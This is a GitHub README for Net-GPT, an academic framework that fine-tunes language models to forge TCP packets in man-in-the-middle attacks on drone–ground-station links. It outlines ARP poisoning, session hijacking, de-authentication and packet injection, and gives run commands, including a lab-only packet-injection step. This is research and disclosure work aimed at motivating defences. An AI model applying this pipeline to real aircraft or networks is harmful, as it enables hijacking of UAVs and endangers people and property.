Net-GPT

A LLM-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle

Brett Piggott¹ · Siddhant Patil² · Guohuan Feng¹ · Ibrahim Odat¹ · Rajdeep Mukherjee¹ · Balakrishnan Dharmalingam¹ · Anyi Liu¹
¹Oakland University ²University of Wisconsin–Madison

Overview · Key Results · Architecture · Quick Start · Attacks · Fine-Tuning · Structure · Citation

🔥 News

[Dec 2023] 🏆 Paper presented at IEEE/ACM SEC 2023 — Symposium on Edge Computing, Wilmington, DE
[Nov 2023] 📄 Paper accepted at SEC'23 — Full research paper · DOI: 10.1145/3583740.3626809
[2023] 🔬 Research artifact and codebase publicly released

📖 Overview

"The convergence of Large Language Models with security systems transforms cybersecurity in the AI landscape."

Net-GPT is a research framework demonstrating a novel class of LLM-empowered offensive cyber-physical attacks against Unmanned Aerial Vehicle (UAV) communication systems. The system shows how finely-tuned Large Language Models can be weaponized to:

🎯 Understand network protocols — LLMs learn TCP session structure through QLoRA fine-tuning on real packet captures
🔀 Launch Man-in-the-Middle attacks — Adversarial UAVs intercept and impersonate benign UAV↔GCS communication
📡 Generate mimicked network packets — Context-aligned counterfeit TCP packets generated in real-time via an edge server
⚡ Enable edge-computing deployment — Smaller LLMs (Distil-GPT-2) achieve 47× faster response time while retaining ~78% prediction capability

Threat Model

The adversary operates a malicious UAV that joins the same network as a benign UAV and its Ground Control Station (GCS). The malicious UAV leverages a nearby edge server equipped with fine-tuned LLMs to:

Hijack the benign UAV via ARP poisoning, session hijacking, or de-authentication attacks
Impersonate both endpoints by generating realistic TCP packets using LLM inference
Maintain persistent session control using signaling packets (delayed ACK, DupACK, Keep-Alives)

 ┌──────────────┐         ┌──────────────┐         ┌──────────────┐
 │  Benign UAV  │◄───────►│ Malicious UAV│◄───────►│     GCS      │
 │   (Target)   │  MITM   │  (Attacker)  │  MITM   │  (Victim)    │
 └──────────────┘         └──────┬───────┘         └──────────────┘
                                 │
                          ┌──────▼───────┐
                          │  Edge Server  │
                          │  (RTX 4090)   │
                          │  Fine-tuned   │
                          │  LLM Engine   │
                          └──────────────┘

📊 Key Results

Generative Accuracy — Packet Field Prediction

Model	Parameters	Overall Accuracy	Response Time
Llama-2-13B	13B	95.3%	108.3 s
Llama-2-7B	7B	94.1%	—
GPT-2	137M	74.2% (of 13B)	5.18 s (21× faster)
Distil-GPT-2	82M	77.9% (of 7B)	2.31 s (47× faster)

Per-Field Prediction Accuracy (Llama-2-13B, Best Config)

Field	Src IP	Dst IP	Src Port	Dst Port	Flags	Seq#	Ack#	Length
Accuracy	98.9%	98.9%	98.9%	98.9%	83.4%	96.2%	91.0%	99.0%

Error Analysis (Llama-2-13B)

Error Count	0 errors	1 error	2 errors	3–5 errors	6+ errors
Rate	76.2%	20.3%	1.9%	0%	1.6%

Over 76% of generated packets are error-free. When errors occur, 96.5% involve only a single field — easily correctable by the adversary.

Cost-Efficiency: Dataset Size vs. Training Epochs

Combination	Dataset	Epochs	Accuracy (13B)	Accuracy (7B)
Best	100K	2	96.5%	97.0%
Medium	60K	3	96.0%	96.2%
Low	20K	10	93.5%	92.8%

Larger datasets with fewer epochs consistently outperform smaller datasets with more epochs — key insight for edge-computing deployment strategies.

🏗️ System Architecture

Net-GPT operates in a two-phase attack pipeline:

Phase 1 — UAV Hijacking

Six attack methods targeting the PX4 autopilot communication layer:

Attack	Method	MITM	Unauthorized Access	Denial of Service
MAC Spoofing	Layer 2 impersonation	✅	✅	❌
Session Hijacking	TCP session takeover	✅	✅	❌
ARP Poisoning	ARP cache corruption	✅	✅	❌
Packet Injection	Crafted packet insertion	✅	✅	❌
Flooding Attack	Resource exhaustion	❌	❌	✅
De-authentication	WiFi disassociation	❌	✅	✅

Phase 2 — LLM-Powered Packet Generation

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        FINE-TUNING PIPELINE                         │
 │                                                                     │
 │  Raw PCAP  ──►  tshark extract  ──►  JSON format  ──►  QLoRA tune  │
 │  (bigFlows)     (TCP sessions)      (#Previous,      (NF4 quant,   │
 │  368 MB         6,971 sessions      #Predicted,       8 batch,     │
 │  791K packets   100K packets        #Context)         2e-4 LR)     │
 └─────────────────────────────────────────────────────────────────────┘

 ┌─────────────────────────────────────────────────────────────────────┐
 │                        INFERENCE PIPELINE                           │
 │                                                                     │
 │  Intercepted  ──►  Edge Server  ──►  Fine-tuned  ──►  Scapy craft  │
 │  TCP packet       (RTX 4090)        LLM predict       Inject on    │
 │  from session     Format query      next packet       network      │
 └─────────────────────────────────────────────────────────────────────┘

Fine-Tuning Data Format

Each training entry follows a structured three-section template:

{
  "#Previous_Packet": {
    "Src_IP": "192.168.1.10",
    "Dst_IP": "192.168.1.20",
    "Src_Port": "54321",
    "Dst_Port": "80",
    "Flag": "ACK",
    "Seq": "1001",
    "Ack": "2001",
    "Length": "512"
  },
  "#Predicted_Packet": {
    "Src_IP": "192.168.1.20",
    "Dst_IP": "192.168.1.10",
    "Src_Port": "80",
    "Dst_Port": "54321",
    "Flag": "ACK PSH",
    "Seq": "2001",
    "Ack": "1513",
    "Length": "1024"
  },
  "#Context": "TCP_SESSION_ID:7042"
}

⚡ Quick Start

Requirements

Dependency	Version	Purpose
Python	≥ 3.10	Runtime
PyTorch	≥ 2.0	Model training & inference
Transformers	≥ 4.31	Hugging Face model loading
PEFT	≥ 0.4	QLoRA fine-tuning
bitsandbytes	≥ 0.40	NF4 quantization
Scapy	≥ 2.5	Network packet crafting
tshark	≥ 3.0	PCAP parsing
CUDA	≥ 11.8	GPU acceleration

1. Clone & Install

git clone https://github.com/OdatSec/Net-GPT.git
cd Net-GPT
pip install -r requirements.txt

2. Prepare Dataset

# Download and extract TCP sessions from PCAP
python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/bigFlows.pcap \
    --output data/processed/train.json \
    --max-packets 100000

python src/data_preprocessing/pcap_extractor.py \
    --input data/raw/smallFlows.pcap \
    --output data/processed/test.json

3. Fine-Tune a Model

# Fine-tune Llama-2-13B with QLoRA (default config)
python src/fine_tuning/qlora_trainer.py \
    --model meta-llama/Llama-2-13b-hf \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/llama2-13b-netgpt

# Fine-tune Distil-GPT-2 (edge deployment)
python src/fine_tuning/qlora_trainer.py \
    --model distilgpt2 \
    --dataset data/processed/train.json \
    --epochs 1 \
    --output models/distilgpt2-netgpt

4. Run Inference

# Generate predicted packets from intercepted sessions
python src/inference/predict.py \
    --model models/llama2-13b-netgpt \
    --input data/processed/test.json \
    --output results/predictions_llama2_13b.json

5. Evaluate Results

# Per-field accuracy evaluation
python src/inference/evaluate.py \
    --predictions results/predictions_llama2_13b.json \
    --ground-truth data/processed/test.json \
    --output results/evaluation_llama2_13b.json

6. Craft & Inject Packets (Controlled Lab Only)

# Generate Scapy-compatible packets from predictions
python src/packet_crafting/craft_packets.py \
    --predictions results/predictions_llama2_13b.json \
    --interface eth0

🔬 Fine-Tuning Methodology

QLoRA Configuration

Parameter	Value	Parameter	Value
NF4 Quantization	`nf4`	Logging steps	`10`
Batch size/device	`8`	Learning rate	`2e-4`
Gradient steps	`12`	Global grad norm	`0.3`
Paged Optimizer	`paged_adamw_32bit`	Warm-up ratio	`0.03`
Scheduler	`constant`	Epochs	`1–10`

Models Evaluated

Model	Parameters	HuggingFace ID	Use Case
Llama-2-13B	13B	`meta-llama/Llama-2-13b-hf`	High-accuracy server deployment
Llama-2-7B	7B	`meta-llama/Llama-2-7b-hf`	Balanced accuracy/speed
GPT-2	137M	`gpt2`	Compact edge deployment
Distil-GPT-2	82M	`distilgpt2`	Ultra-fast edge deployment

Dataset Statistics

Property	Fine-Tuning (bigFlows)	Testing (smallFlows)
Size	368 MB	9.4 MB
Packets	791,615	14,261
Flows	40,686	1,209
Applications	132	28
Avg. Packet Size	449 bytes	646 bytes
Duration	5 minutes	5 minutes

🛡️ Attack Pipeline

ARP Poisoning — Layer 2 cache corruption

Corrupts ARP tables on both the target UAV and GCS, redirecting traffic through the malicious UAV. The attacker becomes an invisible relay, enabling full packet interception and modification.

Session Hijacking — TCP session takeover

Exploits the TCP three-way handshake to inject the attacker into an established session. Semi-session and full-session variants allow partial or complete control of the communication channel.

De-authentication — WiFi disassociation attack

Forces the benign GCS to disconnect from the network by sending spoofed de-authentication frames. The malicious UAV then establishes itself as the communication partner.

Packet Injection — Crafted packet insertion

After establishing MITM position, the adversary uses the fine-tuned LLM to generate and inject context-aligned TCP packets that mimic legitimate UAV↔GCS communication patterns.

📁 Repository Structure

Net-GPT/
│
├── 📂 src/                              Source code package
│   ├── data_preprocessing/
│   │   ├── pcap_extractor.py           Extract TCP sessions from PCAP files
│   │   ├── session_parser.py           Parse and structure TCP sessions
│   │   └── json_formatter.py           Format data for fine-tuning
│   │
│   ├── fine_tuning/
│   │   ├── qlora_trainer.py            QLoRA fine-tuning pipeline
│   │   ├── dataset_loader.py           Custom dataset for packet prediction
│   │   └── train_config.py             Training hyperparameter configs
│   │
│   ├── inference/
│   │   ├── predict.py                  Generate packet predictions
│   │   ├── evaluate.py                 Per-field accuracy evaluation
│   │   └── benchmark.py               Response time benchmarking
│   │
│   ├── attacks/
│   │   ├── arp_poisoning.py            ARP cache poisoning implementation
│   │   ├── session_hijack.py           TCP session hijacking
│   │   ├── deauth_attack.py            WiFi de-authentication
│   │   └── mitm_controller.py          MITM orchestration engine
│   │
│   └── packet_crafting/
│       ├── craft_packets.py            Scapy-based packet construction
│       └── session_replayer.py         TCP session replay engine
│
├── 📂 configs/
│   ├── qlora_llama2_13b.yaml          Llama-2-13B fine-tuning config
│   ├── qlora_llama2_7b.yaml           Llama-2-7B fine-tuning config
│   ├── qlora_gpt2.yaml                GPT-2 fine-tuning config
│   └── qlora_distilgpt2.yaml          Distil-GPT-2 fine-tuning config
│
├── 📂 data/
│   ├── raw/                           Raw PCAP captures (user-supplied)
│   └── processed/                     Processed JSON for training/testing
│
├── 📂 models/                          Fine-tuned model checkpoints
│
├── 📂 results/                         Experiment outputs and evaluations
│
├── 📂 figures/                         Paper figures and visualizations
│
├── 📂 docs/
│   ├── METHODOLOGY.md                 Detailed methodology documentation
│   ├── RESULTS.md                     Comprehensive results tables
│   └── EDGE_DEPLOYMENT.md            Edge computing deployment guide
│
├── 📂 scripts/
│   ├── run_all_experiments.sh         Reproduce all paper results
│   ├── evaluate_all_models.sh         Batch evaluation script
│   └── download_dataset.sh           Dataset download helper
│
├── .gitignore                         Git ignore rules
├── CITATION.cff                       Machine-readable citation metadata
├── CONTRIBUTING.md                    Contribution guidelines
├── LICENSE                            MIT License
├── README.md                          This file
├── SECURITY.md                        Security policy & responsible use
└── requirements.txt                   Python dependencies

📐 Research Questions & Findings

The paper systematically investigates three research questions:

RQ1: Does model size significantly improve effectiveness?

Finding: Llama-2-13B (95.3%) marginally outperforms Llama-2-7B (94.1%). The 1.2% gap is surprisingly small given the 2× parameter difference, suggesting model architecture matters more than raw parameter count for protocol understanding tasks.

RQ2: What balances dataset quantity vs. training epochs?

Finding: 100K packets with 2 epochs produces the best accuracy for both models. Larger datasets remarkably improve the Flags field prediction — critical for sustaining communication sessions. More epochs do not improve smaller LLMs and may even degrade performance.

RQ3: Can smaller LLMs produce comparable results?

Finding: Distil-GPT-2 (82M params) achieves 77.9% of Llama-2-7B's capability while being 47× faster (2.31s vs. 108.3s). This enables real-time edge deployment on resource-constrained mobile platforms — crucial for adversarial field operations.

🔄 Reproducibility

All experiments are fully reproducible:

# Reproduce all paper results end-to-end
bash scripts/run_all_experiments.sh

# Reproduce specific model evaluation
python src/inference/evaluate.py \
    --model-name llama2-13b \
    --dataset-sizes 20000 40000 60000 80000 100000 \
    --epochs 1

Artifact	Path	Description
Training data	`data/processed/train.json`	100K packets from bigFlows
Test data	`data/processed/test.json`	14,261 packets from smallFlows
Model configs	`configs/*.yaml`	QLoRA hyperparameters per model
Results	`results/`	Per-field accuracy JSON per experiment

⚠️ Ethics & Responsible Use

All experiments were conducted in an isolated laboratory environment with UAVs operating under the PX4 autopilot simulation framework. No real airspace, operational networks, production UAV systems, or public wireless infrastructure was involved at any stage of this research.

The attack implementations in this repository are disclosed as part of responsible academic vulnerability research demonstrating how adversarial LLM capabilities extend to network-level physical systems. The intent is to motivate the design of LLM-aware network security defenses for UAV communication infrastructure.

⛔ Do not deploy any attack component against real aircraft, live airspace, operational networks, or systems you do not own and have explicit authorization to test.

This research was reviewed and approved by the institutional review process at Oakland University.

See SECURITY.md for the full security policy.

📝 Citation

If Net-GPT contributes to your research, please cite:

@inproceedings{piggott2023netgpt,
  title     = {{Net-GPT}: A {LLM}-Empowered Man-in-the-Middle Chatbot for
               Unmanned Aerial Vehicle},
  author    = {Piggott, Brett and Patil, Siddhant and Feng, Guohuan and
               Odat, Ibrahim and Mukherjee, Rajdeep and
               Dharmalingam, Balakrishnan and Liu, Anyi},
  booktitle = {Proceedings of the 2023 IEEE/ACM Symposium on Edge Computing (SEC)},
  year      = {2023},
  pages     = {287--293},
  publisher = {ACM},
  address   = {Wilmington, DE, USA},
  doi       = {10.1145/3583740.3626809},
  isbn      = {979-8-4007-0123-8}
}

A CITATION.cff file is included for GitHub's automatic citation tool.

🔗 Related Work

Project	Venue	Relationship
AeroMind	RAID 2026	Memory-poisoning attacks on LLM-driven UAV agents (follow-up work)
Heterogeneous Generative Dataset for UASes	IEEE MOST 2023	Foundational UAV dataset work

📬 Contact

Author	Affiliation	Role
Brett Piggott	Oakland University	Lead developer
Siddhant Patil	University of Wisconsin–Madison	Contributor
Guohuan Feng	Oakland University	Contributor
Ibrahim Odat	Oakland University	Contributor
Rajdeep Mukherjee	Oakland University	Contributor
Balakrishnan Dharmalingam	Oakland University	Contributor
Anyi Liu	Oakland University	Principal Investigator

_{Net-GPT · IEEE/ACM SEC 2023 · Oakland University · University of Wisconsin–Madison

Released under the MIT License}

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
.github		.github
configs		configs
data		data
docs		docs
figures		figures
results		results
scripts		scripts
src		src
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CITATION.cff		CITATION.cff
CODE_OF_CONDUCT.md		CODE_OF_CONDUCT.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
README.md		README.md
SECURITY.md		SECURITY.md
pyproject.toml		pyproject.toml
requirements.txt		requirements.txt

Folders and files

Latest commit

History

Repository files navigation

Net-GPT

A LLM-Empowered Man-in-the-Middle Chatbot forUnmanned Aerial Vehicle

🔥 News

📖 Overview

Threat Model

📊 Key Results

Generative Accuracy — Packet Field Prediction

Per-Field Prediction Accuracy (Llama-2-13B, Best Config)

Error Analysis (Llama-2-13B)

Cost-Efficiency: Dataset Size vs. Training Epochs

🏗️ System Architecture

Phase 1 — UAV Hijacking

Phase 2 — LLM-Powered Packet Generation

Fine-Tuning Data Format

⚡ Quick Start

Requirements

1. Clone & Install

2. Prepare Dataset

3. Fine-Tune a Model

4. Run Inference

5. Evaluate Results

6. Craft & Inject Packets (Controlled Lab Only)

🔬 Fine-Tuning Methodology

QLoRA Configuration

Models Evaluated

Dataset Statistics

🛡️ Attack Pipeline

📁 Repository Structure

📐 Research Questions & Findings

RQ1: Does model size significantly improve effectiveness?

RQ2: What balances dataset quantity vs. training epochs?

RQ3: Can smaller LLMs produce comparable results?

🔄 Reproducibility

⚠️ Ethics & Responsible Use

📝 Citation

🔗 Related Work

📬 Contact

About

Topics

Resources

License

Code of conduct

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

A LLM-Empowered Man-in-the-Middle Chatbot for
Unmanned Aerial Vehicle

Packages